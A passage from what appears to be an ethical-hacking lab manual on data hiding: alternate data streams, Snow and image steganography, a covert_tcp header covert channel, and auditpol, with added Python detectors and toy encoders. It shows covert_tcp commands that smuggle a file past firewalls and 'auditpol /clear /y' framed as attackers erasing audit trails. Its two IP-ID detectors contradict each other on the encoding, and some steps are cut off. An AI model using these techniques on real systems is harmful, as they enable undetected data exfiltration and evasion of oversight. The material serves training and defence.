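    if not sys.platform.startswith("win"):
        raise OSError("alternate data streams are an NTFS feature; run this on Windows")
    with open(f"{path}:{stream}", "rb") as fh:
        return looks_like_pe(fh.read(2))


# Constructed sample of what `dir /R C:\magic` could print after step 10 of the lab.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.

 Directory of C:\\magic

03/10/2018  10:05 AM    <DIR>          .
03/10/2018  10:05 AM    <DIR>          ..
03/10/2018  10:06 AM                13 readme.txt
                               27,136 readme.txt:calc.exe:$DATA
               1 File(s)             13 bytes
"""

if __name__ == "__main__":
    for s in suspicious_streams(SAMPLE_DIR_R):
        print(f"{s.file} carries hidden stream '{s.stream}' ({s.size} bytes)")
```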


Lab Analysis
Document all the results discovered during the lab.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Platform Supported
Hiding Data using White Space
Steganography

Snow is used to conceal messages in ASCII text by appending whitespace to the end of
lines. Because spaces and tabs are generally not visible in text viewers, the message is
effectively hidden from casual observers. And if the built-in encryption is used, the
message cannot be read even if it is detected.


Lab Scenario

Network steganography describes all the methods used for transmitting data over a
network without it being detected. Several methods for hiding data in a network have
been proposed, but the main drawback of most of them is that they do not offer a
secondary layer of protection: if the steganography is detected, the data is in plain text.
Attackers use steganography to transfer sensitive information out of the target system
undetected. To be an expert Ethical Hacker and Penetration Tester, you must have a
sound knowledge of various steganography techniques.
Lab Objectives
The objective of this lab is to help students learn:

= Using Snow steganography to hide files and data

= Hiding files using spaces and tabs


Lab Environment
To carry out the lab, you need:
= Snow located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Whitespace Steganography Tools\Snow
= Download the latest version of Snow at
http://www.darkside.com.au/snow
= If you wish to download the latest version, then the screenshots shown in the lab
might differ.
= Run this tool on Windows Server 2016
Lab Duration

Time: 5 Minutes
Overview of Snow

Snow exploits the steganographic nature of whitespace. Locating trailing whitespace
in text is like finding a polar bear in a snowstorm. It uses the ICE encryption algorithm,
so the name is thematically consistent.


Lab Task

1. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Whitespace Steganography Tools,
Shift+right-click the Snow folder, and select Open command window here
from the context menu.

2. Open Notepad, type Hello World! and press Enter; then long-press the hyphen key to
draw a line below it.

3. Save the file as readme.txt in the folder where SNOW.EXE is located.

FIGURE 12.1: Contents of readme.txt


4. Type this command in the command shell:
snow -C -m "My swiss bank account number is 45656684512263" -p
"magic" readme.txt readme2.txt

(Here, magic is the password. You can type your desired password also.
readme2.txt is the name of another file which will be created automatically
in the same location.)

FIGURE 12.2: Hiding the message in readme2.txt
5. Now the data ("My Swiss bank account number is 45656684512263") is
hidden inside the readme2.txt file with the contents of readme.txt.
6. The contents of readme2.txt are readme.txt + My Swiss bank account
number is 45656684512263.

7. Now type snow -C -p "magic" readme2.txt; it will show the contents of
readme.txt (magic is the password which was entered while hiding the data).

FIGURE 12.3: Revealing the hidden data
8. To check the file in a GUI, open readme2.txt in Notepad and go to Edit >
Select All. You will see the hidden data inside readme2.txt in the form of spaces
and tabs.

FIGURE 12.4: Contents of readme2.txt with all text selected
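To make the hiding place concrete, here is an added Python example (not SNOW's code): a toy encoder that stores one byte per line as eight trailing tab/space characters, the matching decoder, and a scanner that flags text ending in mixed tabs and spaces. Real SNOW packs 3 bits into each tab-and-spaces group (per its documentation) and can compress and ICE-encrypt the payload, so the toy decoder does not read snow.exe output; the cover text is constructed to mirror the lab's readme.txt.

```python
"""Added example, not SNOW's own code: a toy whitespace encoder/decoder plus a
scanner that flags text carrying trailing spaces and tabs.

The toy scheme appends one byte per line as eight characters, tab = 1 bit and
space = 0 bit, after the visible text.  Real SNOW uses a different packing and
can compress and ICE-encrypt the payload, so this decoder will NOT read a file
produced by snow.exe; it is here to make the hiding place visible and to show
what a scanner should look for.
"""
from typing import List, Tuple

TAB, SPACE = "\t", " "


def hide_in_whitespace(cover: str, secret: bytes) -> str:
    """Append 8 whitespace chars (one byte) to each cover line; pad with blank lines."""
    lines = cover.split("\n")
    # blank lines added on demand so every secret byte gets a carrier line
    while len(lines) < len(secret):
        lines.append("")
    out = []
    for i, line in enumerate(lines):
        line = line.rstrip(" \t")              # start from clean line ends
        if i < len(secret):
            bits = format(secret[i], "08b")
            line += "".join(TAB if b == "1" else SPACE for b in bits)
        out.append(line)
    return "\n".join(out)


def reveal_from_whitespace(text: str) -> bytes:
    """Inverse of hide_in_whitespace: read trailing whitespace, 8 chars per byte."""
    secret = bytearray()
    for line in text.split("\n"):
        trail = line[len(line.rstrip(" \t")):]
        if len(trail) < 8:
            continue                             # no payload on this line
        bits = "".join("1" if c == TAB else "0" for c in trail[-8:])
        secret.append(int(bits, 2))
    return bytes(secret)


def trailing_whitespace_report(text: str) -> List[Tuple[int, int, int]]:
    """Defender view: (line number, trailing spaces, trailing tabs) for every line
    that ends in whitespace.  Editors rarely leave tabs after text, so a file where
    many lines end in mixed tabs and spaces deserves a closer look."""
    report = []
    for n, line in enumerate(text.split("\n"), start=1):
        trail = line[len(line.rstrip(" \t")):]
        if trail:
            report.append((n, trail.count(SPACE), trail.count(TAB)))
    return report


def looks_stegged(text: str, min_lines: int = 2) -> bool:
    """Heuristic: at least `min_lines` lines end in whitespace mixing tabs and spaces."""
    mixed = [r for r in trailing_whitespace_report(text) if r[1] and r[2]]
    return len(mixed) >= min_lines


# Constructed cover text modelled on the lab's readme.txt, and the lab's message.
COVER = "Hello World!\n------------\n"
SECRET = b"My Swiss bank account number is 45656684512263"

if __name__ == "__main__":
    stego = hide_in_whitespace(COVER, SECRET)
    print(repr(stego[:60]))
    print(reveal_from_whitespace(stego))
    print(trailing_whitespace_report(stego)[:3], looks_stegged(stego))
```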


Lab Analysis

Analyze and document the results related to the lab exercise.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Internet Connection Required
Yes / No
Platform Supported
Classroom / iLabs


Image Steganography using
OpenStego

OpenStego is a steganography tool that hides data inside images.

Lab Scenario

The terrorists know that so many different types of files can hold all sorts of hidden
information, and tracking or finding these files can be an almost impossible task. So
they use steganographic techniques to hide data. This allows them to retrieve messages
from their home bases and send back updates without a hint of malicious activity
being detected.

These messages can be placed in plain sight, and the servers that supply these files will
never know it. Finding these messages is like finding the proverbial "needle" in the
World Wide Web haystack.

In order to be an expert ethical hacker and penetration tester, you must understand
how to hide text inside an image. In this lab we show how text can be hidden
inside an image using the OpenStego tool.
Lab Objectives
The objective of this lab is to help the students learn how to hide secret text messages in
images using OpenStego.
Lab Environment
To perform this lab, you need:
= Windows 10 running as a virtual machine
= OpenStego located at Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Image Steganography Tools\OpenStego
= Administrative privileges to install and run tools
= Or, download the OpenStego tool from
http://sourceforge.net/projects/openstego/files
= If you wish to download the latest version, screenshots may differ
= Run this tool on the Windows 10 virtual machine


Lab Duration

Time: 10 Minutes

Overview of OpenStego

OpenStego is a Java-based application and supports password-based encryption of data
for an additional layer of security. It uses the DES algorithm for data encryption, in
conjunction with MD5 hashing to derive the DES key from the password provided.


Lab Tasks

1. Launch the Windows 10 virtual machine and log in to the Admin user
account.

2. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Image Steganography
Tools\OpenStego, and double-click Setup-OpenStego-0.6.1.exe.

3. If the Open File - Security Warning pop-up appears, click Run.
4. If a User Account Control pop-up appears, click Yes.


5. The OpenStego Setup wizard appears; click I Agree.

FIGURE 13.1: Installing OpenStego
6. In the next step of the wizard, click Install.
Note: If the setup asks for Java installation, click No and proceed.

FIGURE 13.2: Installing OpenStego
7. On completing the installation, click Close.

FIGURE 13.3: Installed OpenStego
8. Navigate to the Apps list in the Start menu, and click the Run OpenStego
icon to launch the application.

FIGURE 13.4: Launching OpenStego

9. The OpenStego main window appears, as shown in the screenshot:

FIGURE 13.5: OpenStego Main Window
10. Click the ellipsis under the Message File section.

FIGURE 13.6: Clicking the ellipsis button
11. The Open - Select Message File window appears. Navigate to Z:\CEH-
Tools\CEHv10 Module 06 System Hacking\Steganography
Tools\Image Steganography Tools\OpenStego, select New Text
Document.txt, and click Open. The text file contains sensitive
information such as VISA and PIN numbers.

FIGURE 13.7: Open - Select Message File Window
12. The location of the selected file appears in the Message Fi

FIGURE 13.8: Clicking the ellipsis button
14. The Open - Select Cover File window appears. Navigate to Z:\CEH-
Tools\CEHv10 Module 06 System Hacking\Steganography
Tools\Image Steganography Tools\OpenStego, select Island.jpg, and
click Open.

FIGURE 13.9: Open - Select Cover File Window
15. Now, both the Message file and the Cover file are uploaded. By
performing steganography, the message file will be hidden in the image
file.

16. Click the ellipsis under Output Stego File.
17. The Save - Select Output Stego File window appears. Choose a location
where you want to save the file. In this lab, the location chosen is
the Desktop.

18. Provide the file name stego and click Open.

FIGURE 13.13: Providing the File Name
19. Now, click Hide Data.

FIGURE 13.14: Click Hide Data button

20. A Success pop-up appears, stating that the message has been successfully
hidden. Click OK.

FIGURE 13.15: Success pop-up


21. Minimize the OpenStego window. The image containing the secret
message appears on the Desktop. Double-click the image to view it.

Note: It can take the image file some time to open.

FIGURE 13.16: Image Containing the Secret Message
22. You will see only the image but not the contents of the message (text file)
embedded in it, as shown in the screenshot:

23. Close the Windows Photo Viewer, maximize the OpenStego window,
and click Extract Data in the left pane.

FIGURE 13.18: Extracting the Hidden Data
24. Click the ellipsis button to the right of the Input Stego File box.

FIGURE 13.19: Clicking the Ellipsis Button

25. The Open - Select Input Stego File window opens. Navigate to
the Desktop, select stego.png, and click Open.

FIGURE 13.20: Open - Select Input Stego File Window
26. Click the ellipsis button to the right of the Output Folder for Message
File box.

FIGURE 13.21: Extract hidden data

27. The Select Output Folder for Message File window appears. Choose a
location to save the message file (Desktop), and click Open.

FIGURE 13.22: Select Output Folder for Message File Window
28. Click Extract Data. This will extract the message file from the image and
save it onto the Desktop.

FIGURE 13.23: Extract Data


29. The Success pop-up appears, stating that the message file has been
successfully extracted from the cover file; the message file is displayed on
the Desktop. Click OK.

FIGURE 13.24: Success pop-up
30. Close the OpenStego window, and double-click New Text
Document.txt.

FIGURE 13.25: Opening the Text Document
31. The file displays all the information contained in the document, as shown
in the screenshot:

FIGURE 13.26: File Containing the Secret Information


32. In real time, an attacker might scan for images that contain hidden
information and use steganography tools to obtain the information
hidden in them.


Lab Analysis

Analyze and document the results related to the lab exercise.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Internet Connection Required 
Image Steganography using Quick
Stego

Quick Stego hides text in pictures so that only other users of Quick Stego can retrieve
and read the hidden secret messages.


Lab Scenario

Pornography sites that are filled with images that sometimes change multiple times
each day require authentication in some cases to access their "better" areas of content,
and the use of steganographic techniques allows an agent to retrieve messages from their
home bases and send back updates, all in the guise of "porn trading." Thumbnails can
be scanned to find out if there are any new messages for the day; once decrypted, these
messages point to links on the same site with the remaining information encrypted.


To be an expert ethical hacker and penetration tester, you must understand how to
hide text inside an image. In this lab, we show how to do so using Quick Stego.
Lab Objectives
The objective of this lab is for students to learn how to hide secret text messages in
images using Quick Stego.
Lab Environment
To perform this lab, you need:

= A computer running Windows Server 2016

= Administrative privileges to install and run tools

= Or, download the Quick Stego tool at http://quickcrypto.com/free-
steganography-software.html

= If you wish to download the latest version, the screenshots may differ
= Run this tool in Windows Server 2016
Lab Duration

Time: 5 Minutes.

Overview of Steganography

Steganography is the art and science of writing hidden messages in such a way that no
one, apart from the sender and intended recipient, suspects the existence of the
message—a form of security through obscurity. Steganography includes the
concealment of information within computer files. In digital steganography, electronic
communications may include steganographic coding hidden inside a transport layer,
such as a document file, image file, program, or protocol.


Lab Tasks
The basic idea in this section is to:
1. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Image Steganography Tools\QuickStego
and double-click QS12Setup.exe.

2. Follow the wizard-driven installation steps to install the application.

FIGURE 14.1: Quick Stego Setup Wizard


3. On completing the installation, launch the Quick Stego application from the
Apps list.

FIGURE 14.2: Windows Server 2016 - Apps

4. The Quick Stego main window appears, as shown in the screenshot.
5. Click Open Image, under Picture, Image, Photo File.


6. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Image Steganography
Tools\QuickStego, select the image file 02 nissan_gt-r specv opt.jpg,
and click Open.
7. The selected image is added; it displays the message: THIS IMAGE DOES
NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE.

FIGURE 14.4: Selecting the image file

8. To embed text in the image, click Open Text, under Text File.
9. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Steganography Tools\Image Steganography
Tools\QuickStego, select the text file text file.txt, and click Open.

10. Selected text will be added in the text box right next to the image as shown
in the following screenshot:

Quick Stego imperceptibly alters the pixels (individual picture elements) of the
image, encoding the secret text by adding small variations in color to the image.
In practice, to the human eye, these small differences do not appear to change
the image.
11. Click Hide Text, under Steganography.

12. The Quick Stego application hides the text within the image, which can be
observed by the message displayed by Quick Stego (The text message
is now hidden in the image), as shown in the screenshot:

FIGURE 14.10: Hiding the text

13. To save the image (in which the text is hidden), click on Save Image,
under Picture, Image, Photo File.

FIGURE 14.11: Save the stego image
14. Provide the file name stego, and click Save (save it to the Desktop).

15. The file is now saved as "stego." Though it seems to be a normal image
file, it has the text hidden in it, which can be made visible by viewing it in Quick
Stego.
16. Exit Quick Stego, and re-launch it from the Apps screen.
17. Click Open Image, under Picture, Image, Photo File.
18. Browse to the stego file (on the Desktop).

19. The hidden text inside the image will be displayed as shown in the following
screenshot:

FIGURE 14.12: Hidden text shown
20. In real time, an attacker might scan for images that contain hidden
information and use steganography tools to obtain the information
hidden in them.
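The OpenStego and Quick Stego labs rest on the same idea: the "small variations in color" described in the note above are least-significant-bit (LSB) embedding. The added Python example below (not either tool's own code, and without OpenStego's DES/MD5 encryption layer) embeds and extracts a message in a constructed pixel buffer, shows why the change is invisible (no channel value moves by more than 1), and computes a crude steganalysis statistic that still reacts to it.

```python
"""Added example, not OpenStego's or Quick Stego's own algorithm: least-significant-
bit (LSB) image steganography on a raw pixel buffer, the generic technique behind the
"small variations in color" the Quick Stego note describes.  OpenStego additionally
DES-encrypts the payload with an MD5-derived key before embedding; omitted here.

Pixels are modelled as a bytearray of 8-bit channel values (e.g. RGB triples) so the
example runs without an image library; the cover and the secret are constructed.
"""
import random
from typing import Optional, Sequence

HEADER_BITS = 32  # payload length in bytes, stored before the payload


def _bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(cover: Sequence[int], message: bytes) -> bytearray:
    """Return a copy of `cover` whose channel LSBs carry len(message) then message."""
    payload = len(message).to_bytes(4, "big") + message
    if len(payload) * 8 > len(cover):
        raise ValueError("cover too small: need %d channel values, have %d"
                         % (len(payload) * 8, len(cover)))
    stego = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        stego[i] = (stego[i] & 0xFE) | bit   # touch only the lowest bit
    return stego


def lsb_extract(stego: Sequence[int]) -> bytes:
    """Read back what lsb_embed hid; raises if the length header is inconsistent."""
    def read(n_bits: int, start: int) -> int:
        value = 0
        for i in range(start, start + n_bits):
            value = (value << 1) | (stego[i] & 1)
        return value
    length = read(HEADER_BITS, 0)
    if HEADER_BITS + length * 8 > len(stego):
        raise ValueError("no valid LSB payload header found")
    out = bytearray()
    for k in range(length):
        out.append(read(8, HEADER_BITS + 8 * k))
    return bytes(out)


def max_channel_delta(a: Sequence[int], b: Sequence[int]) -> int:
    """Largest per-channel change between two buffers; LSB embedding never exceeds 1."""
    return max(abs(x - y) for x, y in zip(a, b))


def lsb_ones_ratio(buf: Sequence[int], n: Optional[int] = None) -> float:
    """Share of channels whose LSB is 1 over the first n values.  Natural image data
    is rarely perfectly balanced; embedded data pushes the ratio towards 0.5, a crude
    but classic steganalysis signal."""
    part = buf[:n] if n else buf
    return sum(v & 1 for v in part) / len(part)


# Constructed cover: 64x64 RGB values with skewed LSBs (about 1 in 4 set) so the
# ratio shift after embedding is visible.
random.seed(7)
COVER = bytearray(random.choice((0, 0, 0, 1)) + (random.randrange(0, 128) << 1)
                  for _ in range(64 * 64 * 3))
# Constructed secret standing in for the lab's "VISA and PIN" text file.
SECRET = b"VISA 4xxx xxxx xxxx 1234 PIN 0000 (constructed sample)"

if __name__ == "__main__":
    stego = lsb_embed(COVER, SECRET)
    print(lsb_extract(stego))
    print("max channel change:", max_channel_delta(COVER, stego))
    used = HEADER_BITS + 8 * len(SECRET)
    print("LSB=1 ratio before/after:",
          round(lsb_ones_ratio(COVER, used), 3), round(lsb_ones_ratio(stego, used), 3))
```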


Lab Analysis 


Analyze and document the results related to the lab exercise. Give your opinion on
your target's security posture and exposure.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
Covert Channels using
Covert_TCP

This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host.
Lab Scenario
Networks use network access control permissions to permit/deny the traffic through
them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, and web
proxies to allow certain traffic. Covert channels can be made by inserting data into
unused fields of protocol headers. There are many unused or misused fields in TCP
or IP over which data can be sent to bypass firewalls.
Lab Objectives
The objective of this lab is to help students learn:

= How to carry covert traffic inside unused fields of TCP and IP headers


Lab Environment 

To carry out this lab, you need:
= A computer running Windows Server 2016
= Kali Linux running as a virtual machine
= Ubuntu running as a virtual machine

Lab Duration

Time: 10 Minutes.


Overview of Covert TCP

Covert TCP manipulates the TCP/IP header of the data packets to send a file one
byte at a time from any host to a destination. It can act like a server as well as a client
and can be used to hide the data transmitted inside an IP header. This is useful when
bypassing firewalls and sending data with legitimate-looking packets that contain no
data for sniffers to analyze.
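As an added detection example (not covert_tcp's own code), the Python below scans per-packet records for the pattern this overview describes: a run of data-less packets to one port whose IP Identification values decode to text. It assumes the byte * 256 IP-ID encoding from Rowland's covert_tcp paper; the packets are constructed, with addresses and ports taken from the lab's setup.

```python
"""Added example (not covert_tcp's own code): a detector for the IP-ID covert channel
the lab's covert_tcp tool builds.  Assumed encoding, stated here because the lab text
does not spell it out: each packet carries one payload byte in the IP Identification
field as byte * 256 (the scheme described in Rowland's covert_tcp paper); confirm the
constant against the covert_tcp.c in the toolkit before relying on the decoder.

Input is one record per packet, as a tcpdump or Wireshark export would give; the
packets below are constructed.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple

FlowKey = Tuple[str, str, int]   # (src, dst, dport)


class Pkt(NamedTuple):
    src: str
    dst: str
    sport: int
    dport: int
    ip_id: int
    flags: str          # tcpdump style: "S" bare SYN, "." ACK, "P." PSH+ACK
    payload_len: int


def ipid_to_byte(ip_id: int) -> Optional[int]:
    """Byte a covert_tcp-style sender would have placed in ip_id, or None if the
    value cannot be a printable/whitespace ASCII byte times 256."""
    if ip_id % 256:
        return None
    b = ip_id // 256
    return b if b in (9, 10, 13) or 32 <= b < 127 else None


def looks_sequential(ids: List[int]) -> bool:
    """Ordinary stacks count IP ID up in small steps; covert data jumps around."""
    steps = [b - a for a, b in zip(ids, ids[1:])]
    return bool(steps) and all(0 < s <= 32 for s in steps)


def find_covert_flows(pkts: List[Pkt], min_pkts: int = 4) -> Dict[FlowKey, bytes]:
    """Map flow -> decoded bytes for flows that fit the channel: a run of payload-less
    SYNs to one port whose IP IDs all decode to text and are not sequential.  Tuned to
    text payloads (the lab sends message.txt); binary payloads need a looser filter."""
    flows: Dict[FlowKey, List[Pkt]] = defaultdict(list)
    for p in pkts:
        flows[(p.src, p.dst, p.dport)].append(p)
    hits: Dict[FlowKey, bytes] = {}
    for key, fl in flows.items():
        if len(fl) < min_pkts:
            continue
        if any(p.payload_len or "S" not in p.flags for p in fl):
            continue                       # real handshakes carry ACKs and data
        decoded = [ipid_to_byte(p.ip_id) for p in fl]
        if None in decoded or looks_sequential([p.ip_id for p in fl]):
            continue
        hits[key] = bytes(decoded)
    return hits


def covert_packets(msg: bytes) -> List[Pkt]:
    """Constructed traffic shaped like step 22's sender: one SYN per byte, no data."""
    return [Pkt("10.10.10.11", "10.10.10.9", 8888, 9999, b * 256, "S", 0) for b in msg]


# Constructed benign flow: a normal handshake and request with a counting IP ID.
BENIGN = [Pkt("10.10.10.5", "10.10.10.9", 51000, 80, 1000 + i, f, n)
          for i, (f, n) in enumerate([("S", 0), (".", 0), ("P.", 120), (".", 0), ("F.", 0)])]
SAMPLE = BENIGN + covert_packets(b"Secret Message\n")

if __name__ == "__main__":
    for (src, dst, dport), data in find_covert_flows(SAMPLE).items():
        print(f"{src} -> {dst}:{dport} carried {data!r} in IP ID fields")
```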
Linux machine, launch a Terminal window and type cd Desktop.
Hit Enter to change the current working directory to Desktop.

FIGURE 15.1: Navigating to Desktop
2. Type mkdir send and hit Enter to make a folder named send on the Desktop.

FIGURE 15.2: Making the send directory
3. Then, to change the current working directory to send, type cd send/ and hit
Enter as shown in the screenshot.

FIGURE 15.3: Navigating to send
4. Now type echo "Secret Message" > message.txt and hit Enter as shown
in the screenshot. This makes a new text file named message containing the
string "Secret Message".


5. Now navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Covert TCP and copy covert_tcp.c and paste it in the send folder
as shown in the screenshot.

FIGURE 15.5: Pasting covert_tcp.c


6. Switch back to the terminal and type cc -o covert_tcp covert_tcp.c and hit
Enter as shown in the screenshot. This compiles the covert_tcp.c file.

FIGURE 15.6: Compiling covert_tcp.c


7. Now switch to the Ubuntu machine. Open a terminal window and type sudo
su. Hit Enter to gain super-user access.

8. Ubuntu will ask for the password; type toor as the password and hit Enter.

Note: The password you type will not be visible in the terminal window.
9. Type tcpdump -nvX port 8888 -i lo and hit Enter to start tcpdump as shown
in the screenshot.

10. Now leave the tcpdump listener running and open another terminal window.
Type cd Desktop/ and hit Enter as shown in the screenshot.

FIGURE 15.9: Navigating to Desktop
11. Type mkdir receive and hit Enter.

FIGURE 15.10: Making the receive directory
12. To change the current working directory, type cd receive/ and hit Enter.

FIGURE 15.11: Navigating to the receive folder


13. Now navigate to Z:\CEH-Tools\CEHv10 Module 06 System
Hacking\Covert TCP and copy covert_tcp.c and paste it in the receive folder
as shown in the screenshot.
14. Switch back to the terminal and type cc -o covert_tcp covert_tcp.c and hit
Enter as shown in the screenshot. This compiles the covert_tcp.c file.


FIGURE 15.13: Compiling covert_tcp.c
15. Now type sudo su and hit Enter to gain super-user access.


16. Ubuntu will ask for the password; type toor as the password and hit Enter.


Note: The password you type will not be visible in the terminal window.


FIGURE 15.14: Getting super-user access

Setup a Listener


17. To start a listener, type ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11
-source_port 9999 -dest_port 8888 -server -file
/home/jason/Desktop/receive/receive.txt and hit Enter as shown in the
screenshot.




Launch Wireshark

18. Now switch back to the Kali machine. Navigate to Applications >
Sniffing & Spoofing and click wireshark as shown in the screenshot.
19. Wireshark starts and a popup saying "Lua: Error during loading:" appears.
Click OK to continue.
20. Double-click on your primary network interface (here eth0) to start
capturing traffic as shown in the screenshot.


Start Sending the Message

21. Minimize Wireshark and switch back to the terminal window.

22. Type ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11 -source_port 8888
-dest_port 9999 -file /root/Desktop/send/message.txt and hit Enter to start
sending the contents of the message.txt file over TCP.


23. Covert_tcp starts sending the string one character at a time as shown in the
screenshot.


24. If you switch to the terminal window in Ubuntu, you will see the message
being received as shown in the screenshot.


FIGURE 15.21: Covert_tcp receiving the message
25. Close this terminal and open the second terminal running in Ubuntu. Press
Ctrl+C to stop tcpdump.


26. You will see that tcpdump shows that no packets were captured on the
network as shown in the screenshot. Close the terminal.


FIGURE 15.22: tcpdump showing no packets captured

27. Now switch to the Kali Linux machine. Navigate to Home/Desktop/receive
and double-click the receive.txt file to view its contents. You will see the full
message saved in the file as shown in the screenshot.


FIGURE 15.23: Message saved in the file


28. Now switch back to the Kali Linux machine. Close the terminal windows and
open Wireshark.
29. Click the stop packet capture button in the menu bar as shown in the
screenshot.


FIGURE 15.24: Stopping the packet capture


30. In the Apply a display filter field, type tcp and hit Enter to view only the
TCP packets as shown in the screenshot.

31. If you examine the communication between the Ubuntu and Kali machines, i.e.
10.10.10.11 and 10.10.10.9, you will find each character of the message string
being sent in individual packets over the network as shown in the following
screenshots.
32. Covert_tcp changes the header of the TCP packets and replaces it with the
characters of the string one character at a time to send the message without being

FIGURE 15.26: TCP header changed to send the message
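Steps 31 and 32 show each character of the message riding in a header field of its own packet, which is exactly what a network monitor can look for. The following Python is an added defender-side example, not part of the lab manual or of covert_tcp: it parses tcpdump -nv style output and flags host pairs whose IP ID values are almost all printable ASCII. It assumes, hypothetically, that the channel places one ASCII byte per packet in the 16-bit IP ID field; the tcpdump lines, addresses and ports are constructed for the example.

```python
"""Flag host pairs whose IP ID fields look like a byte-per-packet covert channel.

Added defender-side example; not part of the CEH lab or of covert_tcp. It
assumes (hypothetically) one ASCII byte per packet in the 16-bit IP ID field:
normal IP IDs spread over 0-65535, so a run of printable values stands out.
"""
import re
from collections import defaultdict

# Constructed tcpdump -nv style output (two lines per packet). The first host
# pair carries "Secret" one byte per SYN; the second is ordinary traffic.
SAMPLE_TCPDUMP = "\n".join(
    [ln for ch in "Secret" for ln in (
        f"IP (tos 0x0, ttl 64, id {ord(ch)}, offset 0, flags [none], proto TCP (6), length 40)",
        "    10.10.10.11.8888 > 10.10.10.9.9999: Flags [S], seq 1000, win 512, length 0")]
    + [ln for i in (54321, 2, 40011, 9, 61000, 13000) for ln in (
        f"IP (tos 0x0, ttl 64, id {i}, offset 0, flags [DF], proto TCP (6), length 52)",
        "    10.10.10.9.44120 > 10.10.10.50.443: Flags [.], ack 1, win 501, length 0")]
)

HDR_RE = re.compile(r"^IP \(.*\bid (\d+),")
FLOW_RE = re.compile(r"^\s+([\d.]+)\.(\d+) > ([\d.]+)\.(\d+):")

def parse_tcpdump(text):
    """Yield (src, dst, ip_id) for each packet in tcpdump -nv output."""
    ip_id = None
    for line in text.splitlines():
        m = HDR_RE.match(line)
        if m:                        # IP header line carries the id field
            ip_id = int(m.group(1))
            continue
        m = FLOW_RE.match(line)
        if m and ip_id is not None:  # the next line names the endpoints
            yield m.group(1), m.group(3), ip_id
            ip_id = None

def find_covert_flows(packets, min_run=6, min_ratio=0.9):
    """Return {(src, dst): bytes} for host pairs whose IP IDs are mostly printable."""
    ids = defaultdict(list)
    for src, dst, ip_id in packets:
        ids[(src, dst)].append(ip_id)
    flagged = {}
    for flow, vals in ids.items():
        printable = [v for v in vals if 0x20 <= v <= 0x7E]
        if len(vals) >= min_run and len(printable) / len(vals) >= min_ratio:
            flagged[flow] = bytes(printable)  # recovered bytes, kept for triage
    return flagged

if __name__ == "__main__":
    for (src, dst), data in find_covert_flows(parse_tcpdump(SAMPLE_TCPDUMP)).items():
        print(f"{src} -> {dst}: IP IDs decode to {data!r}")
```

The same heuristic applies to any fixed header field the channel might use (sequence number high byte, for instance); the threshold parameters keep a single odd packet from raising an alert.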
Lab Analysis


Analyze and document the results related to the lab exercise.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
Viewing, Enabling and Clearing
Audit Policies using Auditpol
Auditpol is a command in Windows Server 2016, Windows Server 2012, and Windows Server
2008, and is required for querying or configuring audit policy at the subcategory level.

Lab Scenario 


In the previous labs you have seen different steps that attackers take during the system
hacking lifecycle. They start with gaining access to the system, escalating privileges,
executing malicious applications, and hiding files. However, to maintain their access
to the target system longer and avoid detection, they need to clear any traces of their
intrusion. It is also essential to avoid a trace back and a possible prosecution for
hacking.
One of the primary techniques to achieve this goal is to manipulate, disable, or erase
the system logs. Once they have access to the target system, attackers can use inbuilt
system utilities to disable or tamper with logging and auditing mechanisms in the system.
Lab Objectives 
The objective of this lab is to help students learn: 

= How to set the audit policies


Lab Environment 
To carry out this lab, you need:
= Auditpol, which is a built-in command in Windows Server 2016
= You can see more audit commands at http://technet.microsoft.com/en-us/library/cc731451%28v=ws.10%29.aspx for Windows Server 2016
= Run this on Windows Server 2016
Lab Duration 
Time: 10 Minutes 
Overview of Auditpol


Auditpol displays information on audit policies and performs functions to manipulate
them.


Lab Task 
1. Launch Command Prompt from the Windows Server 2016 machine. 
2. To view all the audit policies, type the following command:
auditpol /get /category:*
3. Press Enter.
4. To enable the audit policies, type the following at the command prompt:


auditpol /set /category:"system","account logon" /success:enable /failure:enable
5. Press Enter.
FIGURE 16.2: Local Security Policy in Windows Server 2016


6. To check whether the audit policies are enabled, type the following at the
command prompt: auditpol /get /category:*
7. Press Enter.
8. To clear the audit policies, type the following at the command prompt:
auditpol /clear /y
9. Press Enter.
FIGURE 16.4: Audit policies cleared


10. To check whether the audit policies are cleared, type the following at the command
prompt:
auditpol /get /category:*

11. Press Enter.
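Step 10 is the check a defender should automate: if an intruder has run auditpol /clear, every subcategory drops back to "No Auditing". The following Python is an added example, not part of the lab, that compares the text auditpol /get /category:* prints against a required baseline and reports what is no longer audited. The sample output (the cleared state), the baseline and the output layout it assumes are constructed for the example.

```python
"""Check `auditpol /get /category:*` output against a required audit baseline.

Added defender-side example, not part of the CEH lab. Assumes the layout of
the constructed sample: categories at column 0, subcategories indented two
spaces, and the setting as the trailing words of each line.
"""
import re

# Constructed sample of what auditpol prints once `auditpol /clear /y` has
# been run: every subcategory is back to "No Auditing".
CLEARED_OUTPUT = """System audit policy
Category/Subcategory                      Setting
System
  Security System Extension               No Auditing
  System Integrity                        No Auditing
Account Logon
  Credential Validation                   No Auditing
  Kerberos Authentication Service         No Auditing
"""

# Constructed baseline: the outcomes each listed subcategory must audit.
REQUIRED = {
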